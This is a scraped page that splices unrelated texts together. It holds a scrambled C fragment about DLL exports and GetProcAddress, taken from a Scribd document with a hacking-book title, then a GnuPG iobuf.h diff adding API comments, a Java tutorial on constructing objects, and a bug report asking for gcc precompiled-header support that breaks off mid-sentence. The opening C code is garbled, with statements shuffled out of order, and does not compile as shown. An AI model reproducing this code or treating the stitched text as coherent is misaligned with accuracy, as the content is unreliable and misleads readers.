3. Go to the compiler properties of the source file(s) the header is included into (Properties -> C Compiler or Properties -> C++ Compiler) and set the Additional Dependencies field to the precompiled header(s) file name (e.g., myheader.h.pch).
Option #2 (precompiled headers will be created in the build directory):
1. Go to the properties of the header file you want to precompile.
2. Go to the General category and set Tool to either C Compiler or C++ Compiler.
3. Go to the compiler properties of the source file(s) the header is included into (Properties -> C Compiler or Properties -> C++ Compiler), set the Additional Dependencies field to the precompiled header(s) name prefixed by ${OBJECTDIR} (e.g., ${OBJECTDIR}/myheader.h.pch), and set Include Directory to ${OBJECTDIR}.
For Oracle Solaris Studio compilers (see):
1. Go to the source file(s) properties.
2. Set Additional Options on C Compiler or C++ Compiler category to -xpch=auto.
For Qt projects ():
1. Go to Qt project properties.
2. Set PRECOMPILED_HEADER variable to list of headers you want to precompile in Custom Definitions field.
It would be nice to know if some of the above options don't work for you and why.
zachsaw and others,
Could you please share your ideas on how you expected this to be implemented?
Or are the provided workarounds suitable for you?
Regards,
Igor
I was looking for a project-level switch: use / don't use. For quite big projects with more than 100 headers it's annoying to change properties for around 200 files (100 header files and around 100 cpp files).
Precompiled header naming is not important for me; I'm fine with the "<original_header_name>.pch" pattern, like "my_header.h.pch".
The output is a Makefile that builds the project with precompiled headers, so I can commit it, later check it out on a CI node, and build the sources with precompiled headers.
yurac, thanks a lot for the reply!
Could you please answer some more questions to make your requirements clearer?
1. Are you using only GCC or some other compiler sets as well (like Solaris Studio)?
2. Are all sources in your project written in the same language (compiled by the same compiler)? I'm asking because you can't use a C precompiled header for a C++ compilation.
3. Is it OK for you to place precompiled header files in the directory with the headers, or do you expect them to be created in some other location?
4. Do you need to provide some additional compiler options for header compilation?
5. Are you expecting all .pch files to be removed when you clean the project, or should they not be touched on cleaning?
Probably I'll have some more questions a little bit later.
Thanks in advance,
Igor
Hi Igor,
My thinking of precompiled header support is similar to Yurac's.
Particularly, of all the IDEs I've used, I like the implementation by Borland.
You have the option to either "Create and use" / "Do not use" / "Use PCH file" (this last one won't be possible for what I'm suggesting below).
The way they have done it is the precompiled header for the entire project ends up in one PCH file (it's huge but it's also used for code assist / completion). I suspect this is not possible with GCC, but it would be possible to create the same in a "pch" folder as individual files, just like how .o files are dumped into "bin".
Answers to your question to Yurac from my perspective:
> 1. Are you using only GCC or some other compiler sets as well (like Solaris Studio)?
Only GCC.
> 2. Are all sources in your project written in the same language (compiled by the same compiler)? I'm asking because you can't use a C precompiled header for a C++ compilation.
Not at the moment but it is feasible that someone would have C and C++ in one project. Is this technically not possible?
> 3. Is it OK for you to place precompiled header files in the directory with the headers, or do you expect them to be created in some other location?
Some other location -- preferably "pch\Debug" "pch\Release" folders under the same project root. PCH creation phase will generate plenty of files/subfolders within it but that's not a big deal -- they're all contained within the same "pch" folder.
> 4. Do you need to provide some additional compiler options for header compilation?
No. But currently active compiler options should be used to create the pch's. If project compiler options change, all .pch files would need to be recreated.
> 5. Are you expecting all .pch files to be removed when you clean the project, or should they not be touched on cleaning?
Clean should remove .pch files. Keep in mind that a lot of source files refer to the same .h file, which is where pch comes in to reduce compilation time. So long as pch is generated prior to any build actions, total build time will be reduced (experience from other IDEs). In addition, we should only be doing clean minimally anyway.
Hello zachsaw,
Thanks for such detailed answers to my questions.
Borland's approach (as I last saw it in C++Builder 6) as well as Microsoft VS's uses the following
general idea: all includes you want to precompile should be grouped together somehow. Borland's approach uses
pragmas to separate headers that should be precompiled from ones that should not. In MSVS you include the
header into a "special" header file, and in that case it will be precompiled. This approach looks better when compiling
all the headers we have in a project.
So it looks like the better way to have precompiled headers in your project is to create an MSVS-like "special" include file (one for
each compiler) and include all headers you want to precompile in it. This "special" file will then be included into your sources
instead of those headers. After that you can make this file precompilable the way I've described in my comment above.
Such an approach gives you the ability to use any compiler options you want while precompiling this header. It also makes it
possible to separate headers that make sense to precompile from other ones.
Regards,
Igor
Apple Xcode has precompiled headers implemented the same way as MSVC - one selected header pre-compiled into a .pch file and then included into all other sources automatically.
Summing everything up, here are the steps to use pre-compiled headers in NetBeans CND projects for GCC:
1. Create a header file and include into it all the headers you want to precompile. Note: this file is compiler-specific. This means that all C headers should be included into a file which will be precompiled by the C compiler.
2. Replace the includes in the source files by an include of this single header.
3. Set its Custom Build Step Command Line to the header compile line and Outputs to <headername>.h.gch. Note: it's better to place the precompiled header in the same directory as the original headers.
4. Add the following lines to .build-pre target in the Makefile (don't forget to replace <headername> by actual header name):
@echo Pre-compiling headers
@${MKDIR} -p ${CND_BUILDDIR}/${CONF}/${CND_PLATFORM_${CONF}}
@${MAKE} -f nbproject/Makefile-${CONF}.mk <headername>.h.gch
5. Clean and build the project -> the precompiled header will appear and will be used on subsequent re-builds.
Here is an example how it works:
1. Create Quote sample.
2. Create precompiled.h in Header Files folder.
3. Add all includes into it:
#include <iostream>
#include <cstdlib>
#include <list>
#include <assert.h>
#include "cpu.h"
#include "customer.h"
#include "disk.h"
#include "memory.h"
#include "module.h"
#include "system.h"
4. All .cc files should include only precompiled.h.
5. Set Custom Build Step properties of precompiled.h:
Command Line: g++ -c -g -Wall -MMD -MP -MF ${OBJECTDIR}/precompiled.h.pch.d -o precompiled.h.gch precompiled.h
Outputs: precompiled.h.gch
6. Update Makefile (listed under Important Files):
.build-pre:
@echo Pre-compiling headers
@${MKDIR} -p ${CND_BUILDDIR}/${CONF}/${CND_PLATFORM_${CONF}}
@${MAKE} -f nbproject/Makefile-${CONF}.mk precompiled.h.gch
7. Clean and Build Quote -> precompiled.h.gch will appear near precompiled.h and will be used on next rebuilds. | https://netbeans.org/bugzilla/show_bug.cgi?id=153871 | CC-MAIN-2017-04 | refinedweb | 1,572 | 66.84 |
Design Patterns: Null Object
Well, let’s start from the beginning! Sir Tony Hoare created the null reference in 1965. Until now, null checks have been practically a requirement whenever we develop something.
Normal Situation
It is very common to see null checks like this:
public void CreateClient(IClient client)
{
    if (client == null) throw new NullReferenceException();
    if (client.Name == null) throw new NullReferenceException();

    // ... do something
}
But, what if you could guarantee that the object was never null?
For this, see below:
Null Object Pattern
First, we need to define a default object:
public class NullClient : IClient
{
    public int Id => 0;
    public string Name => "Non-client";
    public int Age => 0;
}
Note that our class inherits from the IClient interface.
Once we do that, we only need this check:
static void Main(string[] args)
{
    IClient client = new Client();
    var clientService = new ClientService();

    if (client == null)
        client = new NullClient();

    clientService.CreateClient(client);
}
And when we call the create method, we no longer need to check the object or its name, because we have guaranteed that the object is never null.
Testing with a stopwatch, on my system (2.4GHz Core2 Duo MacBook Pro), the time to the first visible evidence of a test being run is:
run-webkit-tests: 10s
new-run-webkit-tests: 75s
On the other hand, new-run-webkit tests is definitely faster at running through all the layout tests. Total real time (as tested by "time"):
run-webkit-tests: 13m13.386s
new-run-webkit-tests : 18m35.731s
So at the very least, new-run-webkit-tests is giving up a big chunk of its performance advantage to startup latency.
wow, that's slow. I wonder if there was something wrong with your configuration. Were all your files on a local filesystem? I've only ever seen that kind of slowness on a windows machine running on top of an SMB share.
It is true that new-run-webkit-tests is slower than run-webkit-tests for a couple of reasons. The first has to do with spawning off multiple threads, which obviously takes time. The second is that there is a certain amount of "all at once" processing that new-run-webkit-tests does to compute statistics at the start. I have been tempted to fix the latter but I've never seen that it's been a real problem.
Either way, your numbers are an order of magnitude slower than I would expect, so we should figure out what's going on. If you could post the log output from --verbose from the beginning to when testing started that would be a big help.
Seems like we could benefit from using Python's profiler to figure out what's taking the time.
I ran:
python -m cProfile new-run-webkit-tests
and aborted it about 2 minutes in (20% through the tests on my machine).
We spent a whopping 45 SECONDS in time.sleep:
3011 45.569 0.015 45.569 0.015 {time.sleep}
And 3 seconds making some 100k stat calls:
109687 3.603 0.000 3.603 0.000 {posix.stat}
50 seconds were spent reading files:
5441 50.576 0.009 50.576 0.009 {method 'read' of 'file' objects}
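For repeated analysis it can be handier to dump the profile to a file and rank the entries with pstats afterwards. A generic sketch (not the actual new-run-webkit-tests code; the file and function names are made up):

```python
import cProfile
import pstats

def hot():
    # Stand-in for the expensive work being profiled.
    total = 0
    for i in range(100000):
        total += i * i
    return total

profiler = cProfile.Profile()
profiler.enable()
hot()
profiler.disable()
profiler.dump_stats("prof.out")

# Rank by internal time and print the five worst offenders.
stats = pstats.Stats("prof.out")
stats.sort_stats("time").print_stats(5)
```

The same `Stats` object can be re-sorted by `"cumulative"`, `"calls"`, etc. without re-running the profile.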
We're spending a lot of time reading image hashes up front.
TestInfo.__init__ does:
self.image_hash = open(expected_hash_file, "r").read()
(which probably leaks a file handle).
run-webkit-tests reads image hashes when it gets to them. We could too (and probably should). There shouldn't be a thread-safety issue because only one thread is ever processing any given test.
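The leak-free way to read the hash is a plain with block (on Python 2.5 this additionally requires the from __future__ import with_statement mentioned later in this report). A minimal stand-alone illustration, with a made-up temp file standing in for the real -expected.checksum file:

```python
import tempfile
import os

# Write a fake expected-hash file, as a stand-in for <test>-expected.checksum.
fd, expected_hash_file = tempfile.mkstemp(suffix=".checksum")
with os.fdopen(fd, "w") as f:
    f.write("d41d8cd98f00b204e9800998ecf8427e")

# Reading inside 'with' guarantees the handle is closed, even on error.
with open(expected_hash_file, "r") as hash_file:
    image_hash = hash_file.read()

print(image_hash)  # d41d8cd98f00b204e9800998ecf8427e
```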
Created attachment 53662 [details]
Patch
With that patch I see the code sleeping for 5 seconds and reading for 10s.
268 5.258 0.020 5.258 0.020 {time.sleep}
15 9.412 0.627 9.412 0.627 {method 'read' of 'file' objects}
We're also spending 4s in stat, 1s listing directories and 1s calling "startswith":
109687 4.061 0.000 4.061 0.000 {posix.stat}
2842147 1.320 0.000 1.320 0.000 {method 'startswith' of 'str' objects}
1813 1.168 0.001 1.168 0.001 {posix.listdir}
Obviously still more work to do.
This will also get easier to debug once bug 37780 lands.
One thing that would make this latency much easier to deal with is if the meter updated more frequently during things like "Checking build ...". It seems that the part of the code which is updating the meter should be aware of the fact that we have to build DRT and build ImageDiff and possibly start helper processes. We may just want to pass a meter object to the port during check_build().
Created attachment 53667 [details]
Added small speedup to test gathering
Comment on attachment 53667 [details]
Added small speedup to test gathering
Nice!
Comment on attachment 53667 [details]
Added small speedup to test gathering
LGTM, apart from your removal of my beloved one-character variable names ;)
Comment on attachment 53667 [details]
Added small speedup to test gathering
Rejecting patch 53667 from commit-queue.
Failed to run "['WebKitTools/Scripts/test-webkitpy']" exit_code: 1
Last 500 characters of output:
e 533, in loadTestsFromName
module = __import__('.'.join(parts_copy))
File "/Users/eseidel/Projects/CommitQueue/WebKitTools/Scripts/webkitpy/layout_tests/run_webkit_tests_unittest.py", line 36, in <module>
import webkitpy.layout_tests.run_webkit_tests as run_webkit_tests
File "/Users/eseidel/Projects/CommitQueue/WebKitTools/Scripts/webkitpy/layout_tests/run_webkit_tests.py", line 130
with open(self._expected_hash_path, "r") as hash_file:
^
SyntaxError: invalid syntax
Full output:
weird ... is the commit queue bot running an unusual version of python?
Comment on attachment 53667 [details]
Added small speedup to test gathering
Btw, this patch doesn't comply with our new unicode overlords.
I wrote this patch on SL which has python 2.6. I suspect I need to fix it for 2.5.
Add:
from __future__ import with_statement
which fixed it.
I'll make our unicode overlords happy and re-post before I commit.
Landed as r57956. | https://bugs.webkit.org/show_bug.cgi?id=37643 | CC-MAIN-2017-17 | refinedweb | 813 | 66.64 |
On 04/08/2015 08:29 PM, Doug Ledford wrote:
> On Tue, 2015-04-07 at 14:42 +0200, Michael Wang wrote:
>> Add new callback query_transport() and implement for each HW.
>
> My response here is going to be a long email, but that's because it's
> easier to respond to the various patches all in one response in order to
> preserve context. So, while I'm responding to patch 1 of 17, my
> response will cover all 17 patches in whole.

Thanks for the review :-)

>> Mapping List:
[snip]
>>
>> diff --git a/drivers/infiniband/core/device.c b/drivers/infiniband/core/device.c
>> index 18c1ece..a9587c4 100644
>> --- a/drivers/infiniband/core/device.c
>> +++ b/drivers/infiniband/core/device.c
>> @@ -76,6 +76,7 @@ static int ib_device_check_mandatory(struct ib_device *device)
>>  } mandatory_table[] = {
>>      IB_MANDATORY_FUNC(query_device),
>>      IB_MANDATORY_FUNC(query_port),
>> +    IB_MANDATORY_FUNC(query_transport),
>>      IB_MANDATORY_FUNC(query_pkey),
>>      IB_MANDATORY_FUNC(query_gid),
>>      IB_MANDATORY_FUNC(alloc_pd),
>
> I'm concerned about the performance implications of this. The size of
> this patchset already points out just how many places in the code we
> have to check for various aspects of the device transport in order to do
> the right thing. Without going through the entire list to see how many
> are on critical hot paths, I'm sure some of them are on at least
> partially critical hot paths (like creation of new connections). I
> would prefer to see this change be implemented via a device attribute,
> not a functional call query. That adds a needless function call in
> these paths.

That's exactly the first issue that came to my mind while working on this.
Mostly I was influenced by the current device callback mechanism: we have
plenty of query callbacks and they are widely used in hot paths, thus I
finally decided to use query_transport() to utilize the existing mechanism.

Actually I used to learn that the bitmask operation is somewhat expensive
too, while the callback may only cost two registers, one instruction and
two jumps, thus I guess we may need some benchmark to tell the difference
in performance, so I just picked the easier way as a first step :-P

>> diff --git a/drivers/infiniband/core/verbs.c b/drivers/infiniband/core/verbs.c
>> index f93eb8d..83370de 100644
>> --- a/drivers/infiniband/core/verbs.c
>> +++ b/drivers/infiniband/core/verbs.c
>> @@ -133,14 +133,16 @@ enum rdma_link_layer rdma_port_get_link_layer(struct ib_device *device, u8 port_
>>      if (device->get_link_layer)
>>          return device->get_link_layer(device, port_num);
>>
>> -    switch (rdma_node_get_transport(device->node_type)) {
>> +    switch (device->query_transport(device, port_num)) {
>>      case RDMA_TRANSPORT_IB:
>> +    case RDMA_TRANSPORT_IBOE:
>>          return IB_LINK_LAYER_INFINIBAND;
>
> If we are preserving ABI, then this looks wrong. Currently, IBOE
> returns transport IB and link layer Ethernet. It should not return
> link layer IB; it does not support IB link layer operations (such as MAD
> access).

That's my bad, IBOE is ETH link layer.

> [snip]
>>  };
>
> I'm also concerned about this. I would like to see this enum
> essentially turned into a bitmap. One that is constructed in such a way
> that we can always get the specific test we need with only one compare
> against the overall value. In order to do so, we need to break it down
> into the essential elements that are part of each of the transports.
> So, for instance, we can define the two link layers we have so far, plus
> reserve one for OPA which we know is coming:

The idea sounds interesting, but frankly speaking I'm already starting to
worry about the size of this patch set...

I really prefer to move optimizing/reforming work like this to the next stage,
after this pioneer patch set settles down and works stably. After all, we will
have already gotten rid of the old transport helpers, and reforming based on
that should be far easier and clearer.

The next version will be reorganized to separate the implementation and wrapper
replacement, which makes the patch set even bigger. Fortunately, since the logic
is not very complex, we are still able to handle it. I really prefer that we
focus on performance and conciseness after the infrastructure is built up.

> RDMA_LINK_LAYER_IB   = 0x00000001,
> RDMA_LINK_LAYER_ETH  = 0x00000002,
> RDMA_LINK_LAYER_OPA  = 0x00000004,
> RDMA_LINK_LAYER_MASK = 0x0000000f,
[snip]
>
> From patch 2/17:
>
>> +static inline int rdma_ib_mgmt(struct ib_device *device, u8 port_num)
>> +{
>> +    enum rdma_transport_type tp = device->query_transport(device, port_num);
>> +
>> +    return (tp == RDMA_TRANSPORT_IB || tp == RDMA_TRANSPORT_IBOE);
>> +}
>
> This looks wrong. IBOE doesn't have IB management. At least it doesn't
> have subnet management.

This helper actually could be erased in the end :-) After Sean's suggestion on the cma
stuff, nowhere needs this raw helper anymore; just cap_ib_cm(), cap_iw_cm()
and cap_ib_mad() are enough.

> Actually, reading through the remainder of the patches, there is some
> serious confusion taking place here. In later patches, you use this as
> a surrogate for cap_cm, which implies you are talking about connection
> management. This is very different than the rdma_dev_ib_mgmt() test
> that I create above, which specifically refers to IB management tasks
> unique to IB/OPA: MAD, SM, multicast.
[snip]
>> +static inline int cap_ib_mad(struct ib_device *device, u8 port_num)
>> +{
>> +    return rdma_ib_mgmt(device, port_num);
>> +}
>> +
>
> Why add cap_ib_mad? It's nothing more than rdma_port_ib_fabric_mgmt
> with a new name. Just use rdma_port_ib_fabric_mgmt() everywhere you
> have cap_ib_mad.

That would be excellent if we used more concise semantics to address the
requirement, but I really want to make this the next stage since it sounds
like not a small topic...

At this stage I suggest we focus on:
1. erase all the places using the old transport/link-layer helpers
2. classify helpers for each management branch somewhat accurately
3. make sure it's stable and works well (most important!)

So we can do further reforming based on that milestone in the future ;-)

> [snip]
>
> rdma_port_get_read_sge(dev, port)
> {
>     if (rdma_transport_is_iwarp)
>         return 1;
>     return dev->port[port]->max_sge;
> }
>
> Then, as Jason points out, if at some point in the future the kernel is
> modified to support devices with asymmetrical read/write SGE sizes, this
> function can be modified to support those devices.

This part is actually a big topic too... Frankly speaking, I prefer some
expert in that area to reform this stuff in the future and give it good testing :-)

> Patch 10/17:
>
> As Sean pointed out, force_grh should be rdma_dev_is_iboe(). The cm
> handles iw devices, but you notice all of the functions you modify here
> start with ib_. The iwarp connections are funneled through iw_ specific
> function variants, and so even though the cm handles iwarp, ib, and roce
> devices, you never see anything other than ib/iboe (and opa in the
> future) get to the ib_ variants of the functions. So, they wrote the
> original tests as tests against the link layer being ethernet and used
> that to differentiate between ib and iboe devices. It works, but can
> confuse people. So, everyplace that has !rdma_transport_ib should
> really be rdma_dev_is_iboe instead. If we ever merge the iw_ and ib_
> functions in the future, having this right will help avoid problems.

Exactly. We noticed that the name "transport" does confuse people; the next
version will use rdma_tech_iboe() to distinguish it from the transport stuff,
I guess that will make things more clear :-)

> Patch 11/17:
>
> I wouldn't reform the link_layer_show except to make it compile with the
> new defines I used above.

This is to erase the old transport/link-layer helpers, so we can have
a clean stage for further reforming ;-)

> [snip]
>
> OK.
>
> Patch 17/17:
>
> I would drop this patch. In the future, the mlx5 driver will support
> both Ethernet and IB like mlx4 does, and we would just need to pull this
> code back to core instead of only in mlx4.

Actually we don't need that helper anymore; mlx4 can directly use its own
get_link_layer() implementation, I just left it there as a reminder.

It doesn't make sense to put it at the core level if only mlx4/5 use it; mlx5
would have its own get_link_layer() implementation too if it's going to support
ETH ports, they just need to use that new one :-)

Regards,
Michael Wang
Php error fixer jobs
...some bugs, most of them on the frontend, and some features that need implemented. For example
Hello We have a word press site and we keep unwanted site reg for a while now It could be a plugin or one of our forms is not secure We have no idea ...we need to st...this sort "New user registration on your site : Username: lmcrowell1970 Email: xxxxx" Please help! We are sure it can be fixed in 5 min ! $10-$15 and a top grade to the fixer
I'm looking for a laravel developer, who should be able to fix laravel website errors. I'm expecting all errors should be fixed in 2 days.
Looking for a long-term developer to fix small regular crashes in an Android chat app using crash logs. Access to Crashlytics can be granted. Experience in Git is preferred.
Looking for a long-term developer to fix small regular crashes using crash logs. Access to Crashlytics can be granted. Experience in Git is preferred..
We are building a home, and have picked out many colors, finishes, cabinets and materials. We want to see how they will wor...and materials. We want to see how they will work. I have architectural drawings and examples of the materials we want to use. We are looking for something you might see on Fixer Upper when Joanna sits down with the clients.
I Need tester and bug fixer We have a android app that needs payment gateway fixed .
I have some bugs to fix up on asp.net and server connection You must have GOOD SKILLED and come to my computer (team viewer or anydesk) and fix few issues if you can Thanks to fix site and shopping cart with info on what cc to use,etc.
...SSL certificate on. As you will note there are various SSL mixed content errors being reported. I installed the plugin SSL Insecure Content Fixer and that still wouldn't fix the problem. I have disabled it. I'd like to employ someone to fix all the https conflict by changing the http: references. I DO NOT want someone
Need a map fixer for website which gives log and lat.
...applications entered by drivers for employment. The problem i need to be fixed is it does not send the email notification to the owner when a form was submitted. the files are php. on godaddy Linux server. Also, need a separate quote for job to create code to have the form saved if the form can not be completed at that time ? {large form} (a save
...to develop some software for me. I would like this
I am looking to create short viral videos similar...and is looking to grow with my company on an ongoing basis. The individual needs to be able to take on responsibility in timely delivery, think outside the box, be a "problem fixer", be a "solution finder", be a researcher and be creative. Please provide a link to your portfolio of similar work. had a website created in Wordpress for me and put on my miniature server prior to getting my static ipaddress established and working. Now that my domain is finally pointing to my server only Wordpress login page shows up and not the files and site that was created. I have all files and database on the computer but not sure how to make it all work.
beep beep click click ding - crontab fixer
I am looking for an illustrator to sketch carts (from eng...) and should take up to 2-3 hours max..
...with my website since I have the SSL certificate. I am using hostgator. I use cloudflare to speed up the website and the flexible SSL certificate. I use SSL Insecure Content Fixer plugin to force the SSL on the website but it messes up my website ( I used Really simple SSL before but it was worse). I am experiencing that the server tries to redirect too
...Team: Anton - Director/CEO Tom - Master Mechanic Maris - Engine Specialist Armandito - NCT Prepares Corlito - Engine | Electronic Ervin - Engine Specialist Gena - Master Fixer Dimatrol - Body Repairs (Can you please add to each name from above some general self descriptions to fit their specs and expertise areas) 3) Services: Car Body works
Looking for Magento bug fixer to fixe an issue on mails in magento, the clients don't receive the orders emails anymore, (Cron already set).
Hello, I am looking for a developer to fix a bug caused by Cloudflare's HTTP/2. This is quite annoying because Safari users cannot log in to the site. The error in question, according to Cloudflare's tests: * http2 error: Invalid HTTP header field was received: frame type: 1, stream: 1, name: [upgrade], value: ...
For a website that is already online we're looking for a bug fixer. If you can deliver good work it can be long therm relationship.
Hello, Please bid under my budget we have frequent projects, for selected freelancer. This needs to be done under 1 hour. Happy Bidding
...Startup manager 5. Uninstall manager 6. File Splitter & Joiner(*) 7. Password Recovery(*) 8. System Optimizer 9. Optimize Internet(*) 10. Tweak Memory(*) 11. Shortcut Fixer(*) 12. Repair Wizard(*) 13. Registry Backup 14. System Restore Point 15. Browser Tools 16. Disk Analyzer 17. Drive Wiper 18. Cookies Management 19. Winsock2 Repair (*)
I need my website re-configured. Website templates fixer
I am trying to alert a returned value from a function and i get this in the alert [object Object] here is the javascript code
I need someone to fix the background of some of my photos. See the attached picture. I only want the white sheet with lights as the background. No ceiling or floor to be seen. I have more like this. If you think you can do this, show me a sample.
...$data); if (strlen($rate_info[1]) > 0 && floatval($rate_info[1]) > 0.00) { return (float)$rate_info[1]; } } } return false; } /** * Call to the Fixer Foreign exchange rates and currency conversion API. * Retrieve the conversion rate between base currency and symbol currency. * * @return mixed false in case of errors
Fixer dependencies and install, prepair manual instalation of source
...character, line of code etc). It was working fine a month
retiree/bought a fixer upper two bed rm home want to add a third room size of room is 18x14 raised floor concert footing /only two walls and a roof
I need a production fixer with basic skills to help out during our filming in London for 2 days starting 3rd November. Basic skills, I just need a local to be available during filming.
I need my website re-configured built on wordpress , need someone with ssl content fixer experience and also resizing products images on ecommerce.!
I would require the creation of an improved, better style version of the following desig...
Seeking Sales Assistant and Closer Hello, I am seeking an experienced Tele Caller who can call our potential clients and possibly set appointments or convert to a sale. You should also be able to convince them to join our fashion event over the phone and/or through multiple email followups. List of Tasks: - Call potential clients and take registrations online or set meetings. - Send ...!
Looking for a local fixer / film production manager based in Nagasaki, who can help handle accommodation / transportation / meals / translation for a production team of less than 10 people. Commitment will likely be 2-8 days in Nagasaki.
installing warehouses rack 9-6pm $ 80
We have developed a new type of project management application. We have a development team spread ar...we often add people in to our development team who started with us as bug-fixers. It's a great way to learn our app and prove your skills. If you turn out to be a good bug fixer, we will want you to work with us on longer term development projects.
I own a business that rehabs houses kind of like a fixer upper TV show. I would like to write a how-to book on flipping houses. | https://www.freelancer.com/job-search/php-error-fixer/ | CC-MAIN-2018-39 | refinedweb | 1,361 | 75.2 |
10 Technical guidelines¶
This section contains some more in-depth technical guidelines for Fusion API for Python, not strictly necessary for basic use of MOSEK.
10.1 Limitations¶
The maximum number of structural nonzeros in any single expression object is \(2^{31}-1\).
The total size of an item (the product of dimensions) is limited to \(2^{63}-1\).
10.2 Memory management and garbage collection¶
Users who experience memory leaks using Fusion, especially:
memory usage not decreasing after the solver terminates,
memory usage increasing when solving a sequence of problems,
should make sure that the Model objects are properly garbage collected. Since each Model object may hold large resources that Python's garbage collector cannot reclaim promptly, it is recommended that the Model object is disposed of manually when it is not used any more. The necessary cleanup is performed by the method Model.dispose.
The Model supports the Context Manager protocol, so it will be destroyed properly when used in the construction:
with Model() as M:
    # Work with the model here
    pass
One can also write
try:
    M = Model()
    # Work with the model here
finally:
    M.dispose()

A subclass of Model can also make sure that a partially initialized object is disposed of if its constructor fails:

class MyModel(Model):
    def __init__(self):
        finished = False
        try:
            Model.__init__(self)
            # other initialization
            finished = True
        finally:
            if not finished:
                self.dispose()
10.3 Names¶
The Model object's, variables' and constraints' constructors provide versions with a string name as an optional parameter.
Names introduced in Fusion are transformed into names in the underlying low-level optimization task, which in turn can be saved to a file. In particular:
a scalar variable with name var becomes a variable with name var[],
a one- or more-dimensional variable with name var becomes a sequence of scalar variables with names var[0], var[1], etc. or var[0][0], var[0][1], etc., depending on the shape,
the same applies to constraints,
for a conic constraint with name con, a sequence of slack variables with names con[0].coneslack, etc. or con[0][0].coneslack, etc., depending on the shape of the constraint, is added,
a new variable with name 1.0 may be added.
These are the guidelines. No guarantees are made for the exact form of this transformation.
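As a rough illustration of the expansion described above (plain Python, not the actual Fusion implementation, and covering only the variable case):

```python
import itertools

def fusion_style_names(name, shape):
    """Expand an item name into per-scalar names following the scheme above."""
    if not shape:                        # scalar variable
        return [name + "[]"]
    ranges = [range(n) for n in shape]
    return [name + "".join("[%d]" % i for i in index)
            for index in itertools.product(*ranges)]

print(fusion_style_names("var", ()))      # ['var[]']
print(fusion_style_names("var", (2,)))    # ['var[0]', 'var[1]']
print(fusion_style_names("var", (2, 2)))  # ['var[0][0]', 'var[0][1]', 'var[1][0]', 'var[1][1]']
```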
Note that file formats impose various restrictions on names, so not all resulting names can be written verbatim to each type of file, and when writing to a file further transformations and character substitutions can be applied, resulting in poor readability. This is particularly true for LP files, so saving Fusion problems in LP format is discouraged. The OPF format is recommended instead. See Sec. 15 (Supported File Formats).
10.4 Multithreading¶
The maximum number of threads used by the optimizer can be set with the parameter numThreads.
For conic problems (when the conic optimizer is used) the value set at the first optimization will remain fixed through the lifetime of the process. The thread pool will be reserved once for all and subsequent changes to numThreads will have no effect. The only possibility at that point is to switch between multi-threaded and single-threaded interior-point optimization using the parameter intpntMultiThread.
The parameter numThreads affects only the optimizer. It may be the case that numpy is consuming more threads. In most cases this can be limited by setting the environment variable MKL_NUM_THREADS. See the numpy documentation for more details.
10.5 Efficiency¶
In some cases Fusion must reformulate the problem by adding auxiliary variables and constraints before it can be represented in the optimizer's internal format. This can cause an overhead when the model is constructed. In particular, avoid accumulating an expression one term at a time in a long loop:

ee = Expr.constTerm(k, 0.)
for i in range(n):
    ee = Expr.add(ee, Expr.mul(A[i], x[i]))
A better way is to store the intermediate expressions for \(A_i x_i\) and sum all of them in one step:
ee = Expr.add( [ Expr.mul(AA,xx) for (AA,xx) in zip(A,x)] )
Fusion design naturally promotes this sort of vectorized implementations. See Sec. 6.8 (Vectorization) for more examples.
Parametrize relevant parts of the model
If you intend to reoptimize the same model with changing input data, use a parametrized model and modify it between optimizations by resetting parameter values, see Sec. 6.6 (Parameters). This way the model is constructed only once, and only a few coefficients need to be recomputed each time.
Keep a healthy balance and parametrize only the part of the model you in fact intend to change. For example, using parameters in place of all constants appearing in the model would be overkill, with an adverse effect on efficiency, since all coefficients in the problem would still have to be recomputed each time.
10.7 Deployment¶
When redistributing a Python application using the MOSEK Fusion API for Python 9.3.20, the following libraries must be included:
Furthermore, one (or both) of the directories
python/2/mosek for Python 2.x applications,
python/3/mosek for Python 3.x applications.
must be included.
By default the MOSEK Python API will look for the binary libraries in the MOSEK module directory, i.e. the directory containing __init__.py. Alternatively, if the binary libraries reside in another directory, the application can pre-load the mosekxx library from another location before mosek is imported, e.g. like this
import ctypes ; ctypes.CDLL('my/path/to/mosekxx.dll') | https://docs.mosek.com/latest/pythonfusion/guidelines-fusion.html | CC-MAIN-2022-27 | refinedweb | 833 | 55.34 |
File sharing and storage to OneDrive
I used to be able to save to OneDrive prior to the release of v2. Is this by design, or did the upgrade trigger something? (I do love the new version anyway.)
- Webmaster4o
Save to OneDrive how? Through the share sheet? Programmatically? What changed? Sorry, I need more information about how you used to save to OneDrive in versions past.
If it was through the share sheet, I cannot say why it does not work anymore (does it work elsewhere?)
If it was through the share sheet another alternative would be to use the python SDK provided by Microsoft
Sorry, I should have been clearer: it was through the Share sheet (that wrench thing). It was there, now it is not, but everything else is still there, and I now have to email files to myself so I can use the scripts on another machine... And the iCloud thing, which I don't use, is gone as well. Gist is there, but basically putting anything onto a shared storage space that I can use on multiple platforms is gone.
PS yes it works with other applications... and I did nothing special to get the previous pythonista to recognize it... I find a lot of things on the iPad just appear/happen automagically which in most circumstances is ok.
Were you using 1.4 or 1.5? I thought most of the share sheet options got removed at apple's demand in 1.5
@JonB I can't remember which version since I only bought it last year. No biggie, it is just a pain emailing stuff to myself rather than using a shared drive.
It's relatively easy to get this functionality back. Here's how:
- Create a new script, and call it something like "Open in"
- Paste the following code:
import console, editor
console.open_in(editor.get_path())
- Tap the "wrench" icon
- Tap Edit inside the "wrench" menu, then the (+) button that appears
- Optionally select a nice icon and color for your action
- Tap Done
A "Copy to OneDrive" option should appear in the menu that pops up when you select the new editor action you created.
brilliant! worked like a charm... I even sent it to myself via OneDrive so I don't forget again. | https://forum.omz-software.com/topic/2719/file-sharing-and-storage-to-onedrive | CC-MAIN-2017-26 | refinedweb | 382 | 81.83 |
Channel management
A channel is the mechanism by which messages are published. You don't have to define channels in advance; the act of publishing a message creates the channel if it doesn't already exist.
PubNub supports an unlimited number of channels. A channel name can be any alphanumeric string up to 92 characters. There are a few invalid characters, and some that are reserved for special features.
Refer to Channels section to learn more.
Channel TypesChannel Types
Channels represent any place where messages are sent and received. For example, a channel meant for 1-to-1 direct chat simply means that there are only two users using that channel. A group channel means there are two or more users using that channel.
Direct channels for one-to-one messaging between two users. You can make these channels private to keep the messages secure between the users.
Group channels for many-to-many messaging between multiple users. For instance, a chat room for your family, or for a group of friends. You can make these channels public to allow anyone to join, or make them private and only allow select users to join them.
Broadcast channels for announcements, polls, and other situations in which you want to broadcast messages in a one-to-many arrangement.
Unicast channels for poll responses, sensor inputs, location data, and other situations in which you want to aggregate messages in a many-to-one arrangement.
